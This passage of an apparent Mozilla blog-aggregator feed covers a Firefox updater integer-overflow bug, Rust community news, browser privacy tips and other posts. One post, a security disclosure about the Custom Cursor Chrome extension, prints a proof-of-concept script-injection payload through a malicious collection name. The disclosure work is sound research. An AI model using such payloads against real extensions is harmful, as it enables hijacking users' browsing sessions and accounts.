Also, hex numbers in C and elsewhere are written starting with 0x. That’s not part of the number, it’s just telling you that the thing after it is written in hex so that you know how to read it.

You don’t need to know how to do any arithmetic directly on hex numbers or anything like that, just see how they convert to binary bits. Here’s the conversions of individual hex digits to binary bits:

Binary  Hex
======  ===
 0000    0
 0001    1
 0010    2
 0011    3
 0100    4
 0101    5
 0110    6
 0111    7
 1000    8
 1001    9
 1010    A
 1011    B
 1100    C
 1101    D
 1110    E
 1111    F

Implicit Conversions in C

In C, unlike some languages, there are a bunch of different types that represent different ways of storing numbers; basically, every kind and size of number that CPUs can work with has its own type in C. There’s also a “default” integer type, which is called int. How many bits are in an int depends on the C compiler you’re using (and on its settings)6, but it is guaranteed by the language standard to be signed.

Since C has so many different kinds of numbers, it’s common to need to convert between them. It’s so common in fact that the language designers decided to make those conversions mostly automatic. That means that, for instance, this code compiles and runs as you’d probably expect:

#include <math.h> // to get the declaration for sqrt()

long long geometric_mean(int a, int b) {
  return sqrt(a * b);
}

int main() {
  int a = 42;
  long b = 13;
  double mean = geometric_mean(a, b);
  return mean;
}

Even though none of the types in that code match up at all, the compiler just makes everything work for us. Nice of it, eh? These automatic “fixes” are called implicit conversions, and the rules for how they work are long and not always very intuitive. This is a pretty major gotcha of C programming, because it happens without the programmer even seeing it; you just have to know these things are happening and realize all the implications.

How the Bug Works

That should be all the background we need to understand what went wrong here. Now, let’s have another look back at that original, unpatched function declaration:

static int mar_insert_item(MarFile* mar, const char* name, int namelen,
                          uint32_t offset, uint32_t length, uint32_t flags)

The first two parameters are an internal data structure and a text string, they aren’t relevant here. But after that we see an int parameter, which is meant to contain the length of the string parameter (in C, strings don’t know their own length, the programmer has to keep track of that if they need it).

A few lines into the mar_insert_item function, we find this call:

memcpy(item->name, name, namelen + 1);

I’ll explain what this line is for before we move on. The mar_insert_item function is part of a procedure that reads the index of all the files contained in the MAR package (it’s kind of like a ZIP file, it can contain a bunch of different files and compress them all, and you can extract the whole thing or just individual files). mar_insert_item is called repeatedly, once for each compressed file, and each call adds one entry to the index that’s being gradually built up. This specific line just copies the file’s name into that index entry; memcpy of course is short for “memory copy”, and its parameters are the destination to copy to (which is the name field of the item we’re adding to our index), the source to copy from (the name string was passed into mar_insert_item in the first place), and the amount of memory that needs to be copied, in bytes. That last parameter is where everything goes wrong.

What do you think would happen if mar_insert_item is called with namelen set to the highest positive value it can store, which is 0x7fffffff? Well then, in this one line of code, the program does all of these things:

  1. A 1 gets added to namelen7. But I just said namelen already has the highest positive value it can store, so something has to give. The C language standard doesn’t define what happens in this case, but in practice what you get on most computers is… the addition just happens anyway. So we get the value 0x80000000. But namelen is a signed integer, and that value has its sign bit set! We’ve added 1 to a positive number and it transformed into a negative number. -2,147,483,648 to be precise8. Computers are weird. And we’re not even done yet.
  2. memcpy takes a 64-bit value, so our temporary value has to get extended from 32 bits to 64. That means a sign extension; we take the most significant bit, which is a 1, and copy it into 32 new bits, getting us the value 0xFFFFFFFF80000000. Remember, sign extension preserves the two’s complement value, so the decimal version of that number is still -2,147,483,648, it didn’t change during this step.
  3. The length parameter that memcpy takes is also supposed to be unsigned, so now that the value has been extended to 64 bits, we take those bits and interpret them as an unsigned number. We no longer have -2,147,483,648, we now have positive 18,446,744,071,562,067,968. As a byte length, that’s over 18 million terabytes9. Fair to say that’s more bytes than we could have really meant to be copying here.
  4. Finally, memcpy is called, and it starts trying to copy from name into item->name. But because of that sign extension and unsigned reinterpretation, we can see that it’s going to try to copy waaaaay more bytes than are actually there. So what memcpy ends up doing is copying all the bytes that are there (memcpy does its best for us even when we feed it junk), and then… crashing the program.

And that’s the bug; the updater crashes right here.
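Here is a standalone C sketch of that arithmetic (an illustration only, not the actual MAR code; the memcpy call itself is left out, because actually performing that copy would crash, which is the whole point):

#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

int main(void) {
  int namelen = 0x7fffffff;   /* the largest value a 32-bit signed int can hold */

  /* Step 1: namelen + 1 overflows. Signed overflow is undefined behavior in C;
     on typical two's complement machines it wraps around to the most negative
     value, -2,147,483,648. The unsigned detour below simulates that wrap for
     this demo (the conversion back to int is implementation-defined rather
     than undefined, and gives -2,147,483,648 on mainstream compilers). */
  int wrapped = (int)((unsigned int)namelen + 1u);

  /* Steps 2 and 3: passing the negative int where memcpy expects a size_t
     sign-extends it to 64 bits and reinterprets those bits as unsigned. */
  size_t copy_len = (size_t)wrapped;

  printf("wrapped  = %d\n", wrapped);           /* -2147483648 */
  printf("copy_len = %zu bytes\n", copy_len);   /* 18,446,744,071,562,067,968 on 64-bit systems */
  return 0;
}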

How the Fix Works

Now, with all that background, the fix makes perfect sense. Changing the parameter’s type means that the conversion to unsigned happens at the time mar_insert_item is called, and at that point the value being passed in is still a positive number, so converting it then is harmless (in fact it’s just nothing, that operation doesn’t do anything at all at that point). And then the + 1 is done to an unsigned number, so it’s harmless too, and there’s no sign extension to ever do because the thing being passed to memcpy is no longer signed. Everything gets a lot simpler to understand, and simultaneously more correct.

Takeaways

Don’t Use C

Implicit conversions are a misfeature. What they give you in convenience is more than erased by the potential for invisible bugs. More recently designed languages tend to be more strict about this sort of thing; Rust, for instance, just doesn’t have these kinds of implicit conversions at all, but C is from the 1970s and It Made Sense At The Time™. But in C these things can’t really be avoided; they’re baked into the language. I’d very much recommend using another language for any new programs you work on, for this and a variety of other reasons10.

Layers of Security

This bug wasn’t exploitable in practice, partly because it’s just in an awkward place to exploit, but also because Firefox requires update files to be digitally signed by Mozilla or they won’t be read (beyond the minimum needed to check the signature), much less applied. That means that anybody wanting to attack Firefox users via this bug would also have to compromise Mozilla’s build infrastructure and use it to sign their own malicious MAR file. Having that additional layer of security makes most issues surrounding MAR files much much less concerning.

You Can Do Systems Programming

Something I’ve hoped to get across (and I acknowledge this may not be the ideal topic to make this point, but it’s an important point to me) is that low-level (“systems”) programming isn’t magic or really special in any way. It’s true there’s a lot going on and there’s lots of little details, but that’s true for any kind of programming, or anything else involving computers at all to be honest. Everything involved here was invented and built by people, and it can all be broken down and understood. And that’s the message I want to sign off with: you can do systems programming. It’s not too hard. It’s not too complicated. It’s not limited to just “experts”. You are smart and capable and you can do the thing.


1. A fair question to ask here would be why we even have our own package format. There’s a few reasons and you can read the original discussion from back when the format was first introduced if you’re interested, but the main benefit nowadays is that we’re able to locate and validate the package’s signature before really having to parse anything else. In fact, the bug that this post is about doesn’t get hit until after the MAR file has passed signature validation, so it could only be exploited using either a properly signed MAR or a custom build of Firefox/Thunderbird/whatever other application that disables MAR signing. ↩︎

2. I’m only going to talk about integers, because numbers that have a decimal or fraction part work very differently (and can be implemented a few different ways), and they aren’t relevant here. ↩︎

3. You almost never need numbers that can only be either negative or zero, so neither hardware nor languages generally support those, you’d just have to use a signed integer in that case. ↩︎

4. That is a real thing called signed magnitude and it is used for certain things, but not standard integers in modern computers. ↩︎

5. If you’re curious about the math that explains why this is the case, I’ll direct you to Wikipedia’s proof; I’ve spent enough time in the weeds for one blog post already. ↩︎

6. Theoretically int is meant to be whatever size the computer hardware you’re compiling your program for finds most convenient to work with (its “word size”), so it would be 32 bits on a 32-bit CPU and 64 bits on a 64-bit CPU. In practice though, for backwards compatibility reasons, int is usually 32 bits on all but pretty specialized hardware. It’s best never to depend on int being any particular size and to use the type that specifically represents a particular size if you need to be sure; for instance if you know you need exactly 32 bits, use int32_t, not int. ↩︎

7. If you don’t know C, you might be wondering what the + 1 is even for. It’s a little out of scope for this post, but in short, since as we mentioned earlier C strings don’t keep track of their length, if you don’t store that length off somewhere (and typically you don’t), you need some other way to find where the string ends. That’s done by adding one character made up of all zero bits to the end of the string, called a “null terminator”, so when you’re reading a string and you encounter a null character, then you know the string is over. Most C coding conventions have you leave the terminator out of the length, so whenever you’re doing something that needs to account for the terminator (like copying it, because then you have to copy the terminator also), you have to add 1 to the length so that you have space for it. C programming is full of fiddly details like this. ↩︎

8. This problem shows up so often and is such a common source of security bugs that it gets its own name, integer overflow. On Wikipedia you’ll find lots of famous examples and different ways to combat the issue. ↩︎

9. AKA roughly 16 exbibytes. I swear that is really what it’s called. ↩︎

10. Yes, I acknowledge there are certain circumstances where you really must write things in C, or maybe C++ if you’re lucky. If you have one of those situations, then you already know whatever I could tell you. If you don’t, then don’t use C. And don’t @ me. ↩︎

This Week In RustThis Week in Rust 410

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

Official
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is miette, a library for error handling that is beautiful both in code and output.

Thanks to Kat Marchán for the self-suggestion!

Please submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from the Rust Project

265 pull requests were merged in the last week

Rust Compiler Performance Triage

The largest story for the week is the massive improvements that come from enabling the new pass manager in LLVM, which leads to consistent 5% to 30% improvements across almost all test cases. The regressions were mostly minor, with clear paths for addressing the ones that were not made with some specific trade-off in mind.

Triage done by @rylev. Revision range: 7743c9..83f147

4 Regressions, 4 Improvements, 3 Mixed; 0 of them in rollups

43 comparisons made in total

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs

No RFCs are currently in the final comment period.

Tracking Issues & PRs
New RFCs

No new RFCs were proposed this week.

Upcoming Events

Online
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Enso

Stockly

Timescale

ChainSafe

Kraken

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

This week we have two great quotes!

The signature of your function is your contract with not only the compiler, but also users of your function.

Quine Dot on rust-users

Do you want to know what was harder than learning lifetimes? Learning the same lessons through twenty years of making preventable mistakes.

Zac Burns in his RustConf talk

Thanks to Daniel H-M and Erik Zivkovic for the suggestions!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

Wladimir PalantBreaking Custom Cursor to p0wn the web

Browser extensions make attractive attack targets. That’s not necessarily because of the data handled by the extension itself, but too often because of the privileges granted to the extension. Particularly extensions with access to all websites should better be careful and reduce the attack surface as much as possible. Today’s case study is Custom Cursor, a Chrome extension that more than 6 million users granted essentially full access to their browsing session.

A red mouse cursor with evil eyes grinning with its sharp teeth, next to it the text Custom Cursor. Image credits: Custom Cursor, palomaironique

The attack surface of Custom Cursor is unnecessarily large: it grants the custom-cursor.com website excessive privileges while also disabling default Content Security Policy protection. The result: anybody controlling custom-cursor.com (e.g. via one of the very common cross-site scripting vulnerabilities) could take over the extension completely. As of Custom Cursor 3.0.1 this particular vulnerability has been resolved; the attack surface remains excessive however. I recommend uninstalling the extension; it isn’t worth the risk.

Integration with extension’s website

The Custom Cursor extension will let you view cursor collections on custom-cursor.com website, installing them in the extension works with one click. The seamless integration is possible thanks to the following lines in extension’s manifest.json file:

"externally_connectable": {
  "matches": [ "*://*.custom-cursor.com/*" ]
},

This means that any webpage under the custom-cursor.com domain is allowed to call chrome.runtime.sendMessage() to send a message to this extension. The message handling in the extension looks as follows:

browser.runtime.onMessageExternal.addListener(function (request, sender, sendResponse) {
  switch (request.action) {
    case "getInstalled": {
      ...
    }
    case "install_collection": {
      ...
    }
    case "get_config": {
      ...
    }
    case "set_config": {
      ...
    }
    case "set_config_sync": {
      ...
    }
    case "get_config_sync": {
      ...
    }
  }
}.bind(this));

This doesn’t merely allow the website to retrieve information about the installed icon collections and install new ones, it also provides the website with arbitrary access to extension’s configuration. This in itself already has some abuse potential, e.g. it allows tracking users more reliably than with cookies as extension configuration will survive clearing browsing data.

The vulnerability

Originally I looked at Custom Cursor 2.1.10. This extension version used jQuery for its user interface. As noted before, jQuery encourages sloppy security practices, and Custom Cursor wasn’t an exception. For example, it would create HTML elements by giving jQuery HTML code:

collection = $(
  `<div class="box-setting" data-collname="${collname}">
    <h3>${item.name}</h3>
    <div class="collection-cursors" data-collname="${collname}">
    </div>
  </div>`
);

With collname being unsanitized collection name here, this code allows HTML injection. A vulnerability like that is normally less severe for browser extensions, thanks to their default Content Security Policy. Except that Custom Cursor doesn’t use the default policy but instead:

"content_security_policy": "script-src 'self' 'unsafe-eval'; object-src 'self'",

This 'unsafe-eval' allows calling inherently dangerous JavaScript functions like eval(). And what calls eval() implicitly? Why, jQuery of course, when processing a <script> tag in the HTML code. A malicious collection name like Test<script>alert(1)</script> will display the expected alert message when the list of collections is displayed by the extension.

So by installing a collection with a malicious name the custom-cursor.com website could run JavaScript code in the extension. But does that code also have access to all of extension’s privileges? Yes as the following code snippet proves:

chrome.runtime.sendMessage("ogdlpmhglpejoiomcodnpjnfgcpmgale", {
  action: "install_collection",
  slug: "test",
  collection: {
    id: 1,
    items: [],
    slug: "test",
    name: `Test
      <script>
        chrome.runtime.getBackgroundPage(page => page.console.log(1));
      </script>`
  }
})

When executed on any webpage under the custom-cursor.com domain this will install an empty icon collection. The JavaScript code in the collection name will retrieve the extension’s background page and output some text to its console. It could have instead called page.eval() to run additional code in the context of the background page where it would persist for the entire browsing session. And it would have access to all of extension’s privileges:

"permissions": [ "tabs", "*://*/*", "storage" ],

This extension has full access to all websites. So malicious code could spy on everything the user does, and it could even load more websites in the background in order to impersonate the user towards the websites. If the user is logged into Amazon for example, it could place an order and have it delivered to a new address. Or it could send spam via the user’s Gmail account.

What’s fixed and what isn’t

When I reported this vulnerability I gave five recommendations to reduce the attack surface. Out of these, one has been implemented: jQuery has been replaced by React, a framework not inherently prone to cross-site scripting vulnerabilities. So the immediate code execution vulnerability has been resolved.

Otherwise nothing changed however and the attack surface remains considerable. The following recommendations have not been implemented:

  1. Use the default Content Security Policy or at least remove 'unsafe-eval'.
  2. Restrict special privileges for custom-cursor.com to HTTPS and specific subdomains only. As custom-cursor.com isn’t even protected by HSTS, any person-in-the-middle attacker could force the website to load via unencrypted HTTP and inject malicious code into it.
  3. Protect custom-cursor.com website via Content Security Policy which would make exploitable cross-site scripting vulnerabilities far less likely.
  4. Restrict the privileges granted to the website, in particular removing arbitrary access to configuration options.

The first two changes in particular would have been trivial to implement, especially when compared to the effort of moving from jQuery to React. Why this has not been done is beyond me.

Timeline

  • 2021-06-30: Sent a vulnerability report to various email addresses associated with the extension
  • 2021-07-05: Requested confirmation that the report has been received
  • 2021-07-07: Received confirmation that the issue is being worked on
  • 2021-09-28: Published article (90 days deadline)

The Talospace ProjectDAWR YOLO even with DD2.3

Way back in Linux 5.2 was a "YOLO" mode for the DAWR register required for debugging with hardware watchpoints. This register functions properly on POWER8 but has an erratum on pre-DD2.3 POWER9 steppings (what Raptor sells as "v1") where the CPU will checkstop — invariably bringing the operating system to a screeching halt — if a watchpoint is set on cache-inhibited memory like device I/O. This is rare but catastrophic enough that the option to enable DAWR anyway is hidden behind a debugfs switch.

Now that I'm stressing out gdb a lot more working on the Firefox JIT, it turns out that even if you do upgrade your CPUs to DD2.3 (as I did for my dual-8 Talos II system, or what Raptor sells as "v2"), you don't automatically get access to the DAWR even on a fixed POWER9 (Fedora 34). Although you'll no longer be YOLOing it on such a system, still remember to echo Y > /sys/kernel/debug/powerpc/dawr_enable_dangerous as root and restart your debugger to pick up hardware watchpoint support.

Incidentally, I'm about two-thirds of the way through the wasm test cases. The MVP is little-endian POWER9 Baseline Interpreter and Wasm support, so we're getting closer and closer. You can help.

Karl DubostWhen iOS will allow other browsers

User agent sniffing is doomed to fail. It has this thick layer of opacity and logic, where you are never sure what you will really get in the end.

Stuffed animal through the opaque glass of a window.

This happens all the time and will happen again. It's often not only technical, but business related and just human. But let's focus on the detection of Firefox on iOS. Currently, on iOS, every browser is using the same rendering engine, the one mandated by Apple. Be it Chrome, Firefox, or anything else, they all use WKWebView.

One of the patterns of user agent detections goes like this:

  1. Which browsers? Firefox, Chrome, Safari, etc.
  2. Which device type? Mobile, Desktop, Tablet
  3. Which browser version?

You have 30s to guess what is missing in this scenario?

Yes, the OS. Is it iOS or Android? The current logic for some developers is that

  • Safari + mobile = iOS
  • Firefox + mobile = Android

As of today, Firefox

  • on iOS is version 37
  • on Android is version 94

So if the site has a minimum version support grid like this one:

function l() {
  var t = window.navigator.userAgent,
    e = {
      action: "none",
    },
    n = c.warn,
    o = c.block;
  Object.keys(s).forEach(function (n) {
    t.match(n) && (e = c[s[n]]);
  });
  var r = a.detect(t);
  return (r.msie && r.version <= 11) ||
    (r.safari && r.version <= 8) ||
    (r.firefox && r.version <= 49)
    ? o
    : (r.chrome && r.version <= 21) ||
      (r.firefox && r.version <= 26 && !r.mobile && !r.tablet) ||
      (r.safari && r.version <= 4 && r.mobile) ||
      (r.safari && r.version <= 6) ||
      (r.android && r.version <= 4)
    ? n
    : e;
}

Here the site sees Firefox… so it must be Android, so it must be Gecko. They have set their minimum supported version at 49. Firefox is then considered outdated. The Safari minimum version on their grid is 8. So Firefox on iOS (WKWebView) would have no issues!

Fast Forward To The Future.

When Apple authorizes different rendering engines on iOS (yes, I'm on the optimistic side, because I'm patient), I already foresee a huge webcompat issue. The web developers (who are currently right) will infer in some ways that Firefox on iOS can only be WKWebView. So the day Gecko is authorized on iOS, we can expect more breakages, and ironically some of the webcompat bugs we currently have will go away.

The Rust Programming Language BlogCore team membership updates

The Rust Core team is excited to announce the first of a series of changes to its structure we’ve been planning for 2021, starting today by adding several new members.

Originally, the Core team was composed of the leads from each Rust team. However, as Rust has grown, this has long stopped being true; most members of the Core team are not team leads in the project. In part, this is because Core’s duties have evolved significantly away from the original technical focus. Today, we see the Core team’s purpose as enabling, amplifying, and supporting the excellent work of every Rust team. Notably, this included setting up and launching the Rust Foundation.

We know that our maintainers, and especially team leads, dedicate an enormous amount of time to their work on Rust. We care deeply that it’s possible for not just people working full time on Rust to be leaders, but that part time volunteers can as well. To enable this, we wish to avoid coupling leading a team with a commitment to stewarding the project as a whole as part of the Core team. Likewise, it is important that members of the Core team have the option to dedicate their time to just the Core team’s activities and serve the project in that capacity only.

Early in the Rust project, composition of the Core team was made up of almost entirely Mozilla employees working full time on Rust. Because this team was made up of team leads, it follows that team leads were also overwhelmingly composed of Mozilla employees. As Rust has grown, folks previously employed at Mozilla left for new jobs and new folks appeared. Many of the new folks were not employed to work on Rust full time so the collective time investment was decreased and the shape of the core team’s work schedule shifted from 9-5 to a more volunteer cadence. Currently, the Core team is composed largely of volunteers, and no member of the Core team is employed full time to work on their Core team duties.

We know that it’s critical to driving this work successfully to have stakeholders on the team who are actively working in all areas of the project to help prioritize the Core team’s initiatives. To serve this goal, we are announcing some changes to the Core team’s membership today: Ryan Levick, Jan-Erik Rediger, and JT are joining the Core team. To give some context on their backgrounds and experiences, each new member has written up a brief introduction.

  • Ryan Levick began exploring Rust in 2014 always looking for more and more ways to be involved in the community. Over time he participated more by co-organizing the Berlin Rust meetup, doing YouTube tutorials, helping with various project efforts, and more. In 2019, Ryan got the opportunity to work with Rust full time leading developer advocacy for Rust at Microsoft and helping build up the case for Rust as an official language inside of Microsoft. Nowadays he’s an active Rust project member with some of the highlights including working in the compiler perf team, running the Rust annual survey, and helping the 2021 edition effort.
  • Jan-Erik Rediger started working with Rust sometime in late 2014 and has been a member of the Rust Community Team since 2016. That same year he co-founded RustFest, one of the first conferences dedicated to Rust. In the following years seven RustFest conferences have brought together hundreds of Rust community members all around Europe and more recently online.
  • JT has 15 years of programming language experience. During that time, JT worked at Cray on the Chapel programming language and at Apple on LLVM/Clang. In 2012, they joined Microsoft as part of the TypeScript core team, where they helped to finish and release TypeScript to the world. They stayed on for over three years, helping direct TypeScript and grow its community. From there, they joined Mozilla to work on Rust, where they brought their experience with TypeScript to help the Rust project transition from a research language to an industrial language. During this time, they co-created the new Rust compiler error message format and the Rust Language Server. Their most recent work is with Nushell, a programming language implemented in Rust.

These new additions will add fresh perspectives along several axes, including geographic and employment diversity. However, we recognize there are aspects of diversity we can continue to improve. We see this work as critical to the ongoing health of the Rust project, and it is part of the work that will be coordinated between the Rust core team and the Rust Foundation.

Manish Goregaokar is also leaving the team to be able to focus better on the dev-tools team. Combining team leadership with Core team duties is a heavy burden. While Manish has enjoyed his time working on project-wide initiatives, this coupling isn’t quite fair to the needs of the devtools team, and he’s glad to be able to spend more time on the devtools team moving forward.

The Core team has been doing a lot of work in figuring out how to improve how we work and how we interface with the rest of the project. We’re excited to be able to share more on this in future updates.

We're super excited for Manish’s renewed efforts on the dev tools team and for JT, Ryan, and Jan-Erik to get started on core team work! Congrats and good luck!

This post is part 1 of a multi-part series on updates to the Rust core team.

Cameron KaiserQuestionable RCE with .webloc/.inetloc files

A report surfaced recently that at least some recent versions of macOS can be exploited to run arbitrary local applications using .inetloc files, which may allow a drive-by download to automatically kick off a vulnerable application and exploit it. Apple appeared to acknowledge the fault, but did not assign it a CVE; the reporter seems not to have found the putative fix satisfactory and public disclosure thus occurred two days ago.

The report claims the proof of concept works on all prior versions of macOS, but it doesn't seem to work (even with corrected path) on Tiger. Unfortunately due to packing I don't have a Leopard or Snow Leopard system running right now, so I can't test those, but the 10.4 Finder (which would launch these files) correctly complains they are malformed. As a safety measure in case there is something exploitable, the October SPR build of TenFourFox will treat both .webloc and .inetloc files that you might download as executable. (These files use similar pathways, so if one is exploitable after all, then the other probably is too.) I can't think of anyone who would depend on the prior behaviour, but in our unique userbase I'm sure someone does, so I'm publicizing this now ahead of the October 5 release. Meanwhile, if someone's able to make the exploit work on a Power Mac, I'd be interested to hear how you did it.

The Mozilla BlogLocation history: How your location is tracked and how you can limit sharing it

In real estate, the age old mantra is “location, location, location,” meaning that location drives value. That’s true even when it comes to data collection in the online world, too — your location history is valuable, authentic information. In all likelihood, you’re leaving a breadcrumb trail of location data every day, but there are a few things you can do to clean that up and keep more of your goings-on to yourself. 

What is location history?

When your location is tracked and stored over time, it becomes a body of data called your location history. This is rich personal data that shows when you have been at specific locations, and can include things like frequency and duration of visits and stops along the way. Connecting all of that location history, companies can create a detailed picture and make inferences about who you are, where you live and work, your interests, habits, activities, and even some very private things you might not want to share at all.

How is location data used?

For some apps, location helps them function better, like navigating with a GPS or following a map. Location history can also be useful for retracing your steps to past places, like finding your way back to that tiny shop in Florence where you picked up beautiful stationery two years ago.

On the other hand, marketing companies use location data for marketing and advertising purposes. They can also use location to conduct “geomarketing,” which is targeting you with promotions based on where you are. Near a certain restaurant while you’re out doing errands at midday? You might see an ad for it on your phone just as you’re thinking about lunch.

Location can also be used to grant or deny access to certain content. In some parts of the world, content on the internet is “geo-blocked” or geographically-restricted based on your IP address, which is kind of like a mailing address, associated with your online activity. Geo-blocking can happen due to things like copyright restrictions, limited licensing rights or even government control. 

Who can view your location data?

Any app that you grant permission to see your location has access to it. Unless you carefully read each data policy or privacy policy, you won’t know how your location data — or any personal data — collected by your apps is used. 

Websites can also detect your general location through your IP address or by asking directly what your location is, and some sites will take it a step further by requesting more specifics like your zip code to show you different site content or search results based on your locale.

How to disable location request prompts

Tired of websites asking for your location? Here’s how to disable those requests:

Firefox: Type “about:preferences#privacy” in the URL bar. Go to Permissions > Location > Settings. Select “Block new requests asking to access your location”. Get more details about location sharing in Firefox.

Safari: Go to Settings > Websites > Location. Select “When visiting other websites: Deny.”

Chrome: Go to Settings > Privacy and security > Site Settings. Then click on Location and select “Don’t allow sites to see your location”

Edge: Go to Settings and more > Settings > Site permissions > Location. Select “Ask before accessing”

Limit, protect and delete your location data

Most devices have the option to turn location tracking off for the entire device or for select apps. Here’s how to view and change your location privacy settings:

How to delete your Google Location History
Ready to delete your Google Location History in one fell swoop? There’s a button for that.

It’s also a good idea to review all of the apps on your devices. Check to see if you’re sharing your location with some that don’t need it all or even all the time. Some of them might be set up just to get your location, and give you little benefit in return while sharing it with a network of third parties. Consider deleting apps that you don’t use or whose service you could just as easily get through a mobile browser where you might have better location protection.

Blur your device’s location for next-level privacy

Learn more about Mozilla VPN

The post Location history: How your location is tracked and how you can limit sharing it appeared first on The Mozilla Blog.

Firefox NightlyThese Weeks in Firefox: Issue 100

Highlights

    • Firefox 92 was released today!
    • We’re 96% through M1 for Fluent migration! Great work from kpatenio and niklas!
      • [Screenshot]
        • Caption: A graph showing how Fluent strings have overtaken DTD strings over time as the dominant string mechanism in browser.xhtml. As of September 2nd, it shows that there are 732 Fluent strings and 32 DTD strings in browser.xhtml
      • Fluent is our new localization framework
    • We have improvements coming soon for our downloads panel! You can opt in by enabling browser.download.improvements_to_download_panel in about:config.
  • Nightly now has an about:unloads page to show some of the locally collected heuristics being used to decide which tabs to unload on memory pressure. You can also manually unload tabs from here.
    • As part of Fission-related changes, we’ve rearchitected some of the internals of the WebExtensions framework – see Bug 1708243
  • If you notice recent addons-related regressions in Nightly 94 and Beta 93 (e.g. like Bug 1729395, affecting the multi-account-containers addon), please file a bug and needinfo us (rpl or zombie).

Friends of the Firefox team

For contributions from August 25th to September 7th 2021, inclusive.

Resolved bugs (excluding employees)

Fixed more than one bug

  • Ava Katushka
  • Itiel
  • Michael Kohler [:mkohler]

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

Addon Manager & about:addons
  • :gregtatum landed in Firefox 93 a follow up to Bug 1722087 to migrate users away from the old recommended themes that have been removed from the omni.jar – Bug 1723602.
WebExtension APIs
  • extension.getViews now returns existing sidebar extension pages also when called with a `windowId` filter – Bug 1612390 (closed by one of the changes landed as part of Bug 1708243)

Downloads Panel

Fluent

Form Autofill

  • Bug 1687684 – Fix credit card autofill when the site prefills fields
  • Bug 1688209 – Prevent simple hidden fields from being eligible for autofill.

High-Contrast Mode (MSU Capstone project)

  • Molly and Micah have kicked off another semester working with MSU capstone students. They’ll be helping us make a number of improvements to high-contrast mode on Firefox Desktop. See this meta bug to follow along.
  • We’ll be doing a hack weekend on September 11 & 12 where students will get ramped up on their first bugs and tools needed to do Firefox development.

Lint, Docs and Workflow

Password Manager

  • Welcome Serg Galich, he’ll be working on credential management with Tim and Dimi.

Search and Navigation

  • Drew landed some early UI changes, part of Firefox Suggest, in Nightly. In particular, labels have been added to Address Bar groups. A goal of Firefox Suggest is to provide smarter and more useful results, and better grouping, while also improving our understanding of how the address bar results are perceived. More experiments are still ongoing and planned for the near future.
  • Daisuke landed a performance improvement to the address bar tokenizer. Bug 1726837

Mike TaylorTesting Chrome version 100 for fun and profit (but mostly fun I guess)

Great news readers, my self-imposed 6 month cooldown on writing amazing blog posts has expired.

My pal Ali just added a flag to Chromium to allow you to test sites while sending a User-Agent string that claims to be version 100 (should be in version 96+, that’s in the latest Canary if you download or update today):

screenshot of chrome://flags/#force-major-version-to-100

I’ll be lazy and let Karl Dubost do the explaining of the why, in his post “Get Ready For Three Digits User Agent Strings”.

So turn it on and report all kinds of bugs, either at crbug.com/new or webcompat.com/issues/new.

Firefox Add-on ReviewsYouTube your way—browser extensions put you in charge of your video experience

YouTube wants you to experience YouTube in very prescribed ways. But with the right browser extension, you’re free to alter YouTube to taste. Change the way the site looks, behaves, and delivers your favorite videos. 

Enhancer for YouTube

With dozens of customization features, Enhancer for YouTube has the power to dramatically reorient the way you watch videos. 

While a bunch of customization options may seem overwhelming, Enhancer for YouTube actually makes it very simple to navigate its settings and select just your favorite features. You can even choose which of your preferred features will display in the extension’s easy access interface that appears just beneath the video player.

Enhancer for YouTube offers easy access controls just beneath the video player.

Key features… 

  • Customize video player size 
  • Change YouTube’s look with a dark theme
  • Volume booster
  • Ad blocking (with ability to whitelist channels you OK for ads)
  • Take quick screenshots of videos
  • Change playback speed
  • Set default video quality from low to high def
  • Shortcut configuration

YouTube High Definition

Though its primary function is to automatically play all YouTube videos in their highest possible resolution, YouTube High Definition has a few other fine features to offer. 

In addition to automatic HD, YouTube High Definition can…

  • Customize video player size
  • Support HD for clips embedded on external sites
  • Specify your ideal resolution (4K – 144p)
  • Set a preferred volume level
  • Automatically play the highest quality audio

YouTube NonStop

So simple. So awesome. YouTube NonStop remedies the headache of interrupting your music with that awful “Video paused. Continue watching?” message. 

Works on YouTube and YouTube Music. You’re now free to navigate away from your YouTube tab for as long as you like and not fret that the rock will stop rolling. 

YouTube Audio

Another simple but great extension for music fans, YouTube Audio disables the video broadcast and just streams audio to save you a ton of bandwidth. 

This is an essential extension if you have limited internet bandwidth and only want the music anyway. Click YouTube Audio’s toolbar button to mute the video stream anytime you like. Also helps preserve battery life. 

PocketTube

If you subscribe to a lot of YouTube channels, PocketTube is a fantastic way to organize all your subscriptions by themed collections.

Group your channel collections by subject, like “Sports,” “Cooking,” “Cat videos” or whatever. Other key features include…

  • Add custom icons to easily identify your channel collections
  • Customize your feed so you just see videos you haven’t watched yet, prioritize videos from certain channels, plus other content settings
  • Integrates seamlessly with YouTube homepage 
  • Sync collections across Firefox/Android/iOS using Google Drive and Chrome Profiler

PocketTube keeps your channel collections neatly tucked away to the side.

AdBlocker for YouTube

It’s not just you who’s noticed a lot more ads lately. Regain control with AdBlocker for YouTube.

The extension very simply and effectively removes both video and display ads from YouTube. Period. Enjoy a faster, more focused YouTube. 

SponsorBlock

It’s a terrible experience when you’re enjoying a video or music on YouTube and you’re suddenly interrupted by a blaring ad. SponsorBlock solves this problem in a highly effective and original way. 

